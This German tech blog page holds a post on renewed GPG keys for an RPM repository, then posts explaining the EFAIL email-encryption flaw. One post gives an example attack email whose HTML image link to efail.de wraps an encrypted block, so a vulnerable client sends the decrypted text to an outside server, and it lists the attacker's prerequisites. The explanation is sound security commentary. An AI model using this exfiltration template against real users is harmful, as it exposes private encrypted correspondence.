Linux am Dienstag: Repo mit neuen Schlüsseln versehen

Da der GPG KEY für das Linux am Dienstag Repository abgelaufen ist, habe ich eine Runderneuerung der Schlüssel und Pakte vorgenommen.

Linux am Dienstag: Repo mit neuen Schlüsseln versehen

Alle RPM’s wurden neu erzeugt, damit sie mit dem neuen Schlüssel signiert werden konnten.

Der alte Key sah so aus:

—–BEGIN PGP PUBLIC KEY BLOCK—–

mDMEYs6tIhYJKwYBBAHaRw8BAQdAD9z+lstoAMmXJE9kDcIHy+e6vwwP23xZBYl1
b3aqHAK0Kk1hcml1cyBTY2h3YXJ6IDxyZXBvQGxpbnV4LWFtLWRpZW5zdGFnLmRl
PoiaBBMWCgBCFiEETvwnRb7msDrABGxNKoup/2KAagIFAmLOrSICGwMFCQPCZwAF
CwkIBwIDIgIBBhUKCQgLAgQWAgMBAh4HAheAAAoJECqLqf9igGoCl6oA/1BtJJiB
5fJD2DizEmKAhwMrk+280zzQnOy941LwEtmMAQDeuL4eeiOPFsjoM5AtG10ckHBI
rYEWRV3mT1plh7FbDbg4BGLOrSISCisGAQQBl1UBBQEBB0B9tAI4wfcUdNu6RSVu
CBVsnQNQ2WHHEfnmAqYAqkAdawMBCAeIfgQYFgoAJhYhBE78J0W+5rA6wARsTSqL
qf9igGoCBQJizq0iAhsMBQkDwmcAAAoJECqLqf9igGoCQLABANHqZigu3w4d2t5Y
SN6lSjqRxMWzhj81JdvX6WiUH542AQDOXgvLRGQBx3fH+Wnm7Dkn774Z8rjstn32
4uy2cTKDCQ==
=09pp
—–END PGP PUBLIC KEY BLOCK—–

der neue, gültige Schlüssel sieht so aus:

—–BEGIN PGP PUBLIC KEY BLOCK—–

mDMEYs6tIhYJKwYBBAHaRw8BAQdAD9z+lstoAMmXJE9kDcIHy+e6vwwP23xZBYl1
b3aqHAK0Kk1hcml1cyBTY2h3YXJ6IDxyZXBvQGxpbnV4LWFtLWRpZW5zdGFnLmRl
PoiaBBMWCgBCFiEETvwnRb7msDrABGxNKoup/2KAagIFAmLOrSICGwMFCQPCZwAF
CwkIBwIDIgIBBhUKCQgLAgQWAgMBAh4HAheAAAoJECqLqf9igGoCl6oA/1BtJJiB
5fJD2DizEmKAhwMrk+280zzQnOy941LwEtmMAQDeuL4eeiOPFsjoM5AtG10ckHBI
rYEWRV3mT1plh7FbDbg4BGLOrSISCisGAQQBl1UBBQEBB0B9tAI4wfcUdNu6RSVu
CBVsnQNQ2WHHEfnmAqYAqkAdawMBCAeIfgQYFgoAJhYhBE78J0W+5rA6wARsTSqL
qf9igGoCBQJizq0iAhsMBQkDwmcAAAoJECqLqf9igGoCQLABANHqZigu3w4d2t5Y
SN6lSjqRxMWzhj81JdvX6WiUH542AQDOXgvLRGQBx3fH+Wnm7Dkn774Z8rjstn32
4uy2cTKDCZgzBGaThGQWCSsGAQQB2kcPAQEHQCOCSf61Qhmo1wZbODmJIImfpD+W
v5ovVZT0rAlLwUZTtCpNYXJpdXMgU2Nod2FyeiA8cmVwb0BsaW51eC1hbS1kaWVu
c3RhZy5kZT6ImQQTFgoAQRYhBOtmdrHnB0YObaTlBlYw42n23f+3BQJmk4RkAhsD
BQkFo5qABQsJCAcCAiICBhUKCQgLAgQWAgMBAh4HAheAAAoJEFYw42n23f+3OYwA
/3k1ag9g4tVMeXjW0lZ70B4aboa8MPnagdGMQCPeG/pKAQCCfJ3d/yGRP9A1LVGq
1zvdOSqoV2bfQN7Bpo8sti+uB7g4BGaThGQSCisGAQQBl1UBBQEBB0AeYTfLjOPS
7MNChPXPBu2uZJ+ms9j2SCnYFm098yCWBwMBCAeIfgQYFgoAJhYhBOtmdrHnB0YO
baTlBlYw42n23f+3BQJmk4RkAhsMBQkFo5qAAAoJEFYw42n23f+384wBAN3aG83T
ar6aIQirDKlLEYOLzt8+o5oJ1aNa70rNPzjAAQCHWaSu0G4h4euVMwWVOlhQVZqd
wjc9E53O7y0j3nQcAg==
=/mSN
—–END PGP PUBLIC KEY BLOCK—–

Die Schlüssel sind hier downloadbar, aber DNF müßte die eigentlich selbst finden und zum Update anbieten:

http://repo.linux-am-dienstag.de:80/RPM-GPG-KEY-fedora-$releasever-$basearch

z.B.

http://repo.linux-am-dienstag.de:80/RPM-GPG-KEY-fedora-40-x86_64

Wenn Ihr Probleme damit entdeckt, dann könnt Ihr ja einen Kommentar da lassen.

EFail: Die Katze ist aus dem Sack

Die Katze ist aus dem Sack, das Whitepaper zur EFAIL Schwachstelle ist bekannt. Als Entwickler auch von komplexen Programmen zum Parsen von (auch abgedrehten) Formaten, kann ich Euch sagen, daß es genug Scheisse da draußen gibt, die man fehlertolerant behandeln kann, aber die EFAIL Schwachstelle ist genau das : EIN MEGAFAIL!

Selbstgemachtes GPG Schwachstellen Logo 🙂

EFail – Der MEGAFAIL

Der Exploit basiert darauf, daß man eine verschlüsselte Email an den Empfänger A abgefangen hat, diese aber nicht dekodieren kann. Das bleibt auch nach der Lücke so! Also PGP/GPG sind an sich fein raus, die haben gar keine Schuld an der Sache.

Nun bettet man den verschlüsselten Block der Mail in eine Multipart-Mime Message, die aus zwei HTML und einem Cipherblock (dem verschlüsselten Mailteil) besteht. Das könnte so aussehen:

From: <unverdächtig@kenneich.de>
To: <opfer@opfer.de>
Content-Type: multipart/mixed;boundary="GRENZE"

--GRENZE
Content-Type: text/html;charset=ascii

<html><body><img src="https://efail.de/
--GRENZE
Content-Type: application/pkcs7-mine;smine-type=enveloped-data
Content-Transfer-Encoding: base64

hQIMA+PS/5obaKVzARAAuG0PvUFHEzRp+U9HAm1GgjnUwy6afP60q0QYl9vWby5h
ysIVpoXrHZqn3H8f/+FjsoZ2YpDlCqhvKzn/UaP8kxb21YN1+eSaMi55b6WFyIif
hbxnp2Z155YM6Sx+VrTa55DQEF2c7LzyFKcE1csRiB0py+bWJKFPERRhXxSVOMpv
sZB3oLcZmBS990RgjbGUUZhXClxubwwqXo3K41Wj8kktQvZ7YD6hMz46V26kN4Ru
PLt1PQ/+P0iznlNjXaIckLXUq/RNpRMC5469Dp674OECZ2kc3fFrv5zkZcs0Kg5r
...
--GRENZE
Content-Type: text/html;charset=ascii

"></body></html>
--GRENZE--

Was jetzt passiert ist, daß der Mimeparser des Emailprogramms, den verschlüsselten Block vom PGP Plugin dekodieren läßt und nahtlos in das umgebende HTML einfügt. Es kommt dann eine URL raus wie => „https://efail.de/TEXT+DER+NACHRICHT+AN+DEN+EMPFÄNGER“, welche als Bild in dem HTML eingebettet ist, was die meisten Mailprogramme dazu bringt, diese sofort zu rendern. Also schickt der Client damit eine Bildanfrage und überträgt so die dekodierte Nachricht.

Voraussetzungen

1. Man braucht eine verschlüsselte Email an den Empfänger
2. Man braucht einen Webserver, der mehr als 512 Zeichen in der URL annimmt ( selbstschreiben vermutlich)
3. Man braucht ein Emailprogramm beim Opfer, dessen Parser von einem Irren geschrieben wurde
UND 4. das ungefragt Bilder von externen unbekannten Webseiten nachlädt.

1+2 kann der Angreifer liefern, 3+4 muß das Opfer beisteuern.

Der Pressetenor

Der allgemeine Pressetenor war heute, daß die Plugins einen Bug haben. Wenn aber obiges so zutrifft, dann haben die Plugins keinen BUG, sie sind nur zwingend notwendig, daß der Angriff automatisch ablaufen kann. Schaltet man die aus, läuft der Angriff ins Leere.

Was in einigen Webseiten aber abgeleitet wurde war, daß die Verschlüsselung geknackt wurde und das trotz monatelanger Vorwarnung, die Emailprogramme keinen Schutz dagegen gefunden haben.

Das aber ist LÄCHERLICH.

Hier wird wiedermal eine Sau durchs Dorf getrieben, die es nicht verdient hat. Ja, das Ganze ist ein Bug. Ja, der ist in der Wirkung echt schlimm. Nein, die Verschlüsselung wurde nicht geknackt, die wurde nur vom Emailprogramm automatisch aufgehoben und exfiltriert und genau da liegt der Hund begraben. Wie kann man nur einen Parser bauen, der die drei Teile einer Email, die als DREI Teile in der Email vorliegen, zu einem Teil zusammen fassen? Das ist die Frage.

Die, die den Parser geschrieben haben, der die drei Teile verbindet, die sollten ihre Studiengebühren zurück bekommen, sofern sie welche gezahlt haben!

Schlimmer ist nur noch, daß mindestens drei unterschiedliche Teams den gleichen Fehler gemacht haben.

Updates

Thunderbird wird erst mit einer Version 52.8 nicht mehr verwundbar sein. Ich nehme mal an, die Version kommt jetzt etwas zügiger raus, als geplant.

GPG Pluginschwachstellen

Was bekommt man, wenn man von einer tollen Sicherheitslücke liest, ein lustiges Bild sieht und einen Bug im Grafikprogramm meldet ?

Selbstgemachtes GPG Schwachstellen Logo 🙂

Na ist doch klar, nur Platz #3 in der Reihenfolge der Websites, die über die Schwachstelle berichten 😀

Kurzfassung

Deswegen auch jetzt nur die Kurzfassung: Außer der EFF und dem ForscherSebastian Schinzelaus Münster, weiß noch keiner, was die gefunden haben. Sie empfehlen aber trotzdem die Plugins für Thinderbird & Co. zu entfernen.

Ich vermute, daß man eine Email bauen kann, die den Plugins Kryptoanweisungen unterjubelt, welche die Ausführen  und an den Absender zurück schicken. Ansonsten müßte man ja nicht davor warnen, daß die installiert sind. Vor GPG/PGP an sich, wird ja nicht gewarnt, nur davor die Plugins zu benutzen. Die Autoren müssen auch alles Code aus der gleichen Quelle geklaut haben, weil sonst nicht AppleMail, Outlook und Thunderbird gleichermaßen betroffen wären.

Aber bislang ist das reine Spekulation. Warten wir auf mehr…

Upates: (12:08)

Und da haben wir auch schon den ersten Collateralschaden:

http://www.tagesschau.de/inland/e-mail-verschluesselung-101.html

Die Tageschauredakteure haben die Meldung komplett auf Links gedreht und verbreiten grade, daß die Verschlüsselung gekackt wurde. Leider VERKACKT Leute 😀 Nicht die Verschlüsselung wurde geknackt, sondern die Plugins sind ausnutzbar um auf die verschlüsselten Emails zuzugreifen. Das genau sollen die zwar können, aber nicht, wie ich annehme, fremdbestimmt 😉

Wahrheit: 0  Collateral: 1

Upates: (14:04)

Die Katze ist aus dem Sack. Die Plugins in den Emailprogrammen dekodieren eingebettete Ciphertexte in HTML Emails und leiten die dekodierten Inhalte via HTML Bildlink zu einem eigenen Server aus.
War ja klar, daß die Krypto nicht das Problem sein konnte.

Voraussetzung für so einen Angriff ist aber, daß der Angreifer den verschlüsselten Text einer an das Opfer gesendeten Email hat. Alles-Überwacher wie die NSA haben sowas natürlich auf Lager liegen.

… und so gings weiter …. EFail: Die Katze ist aus dem Sack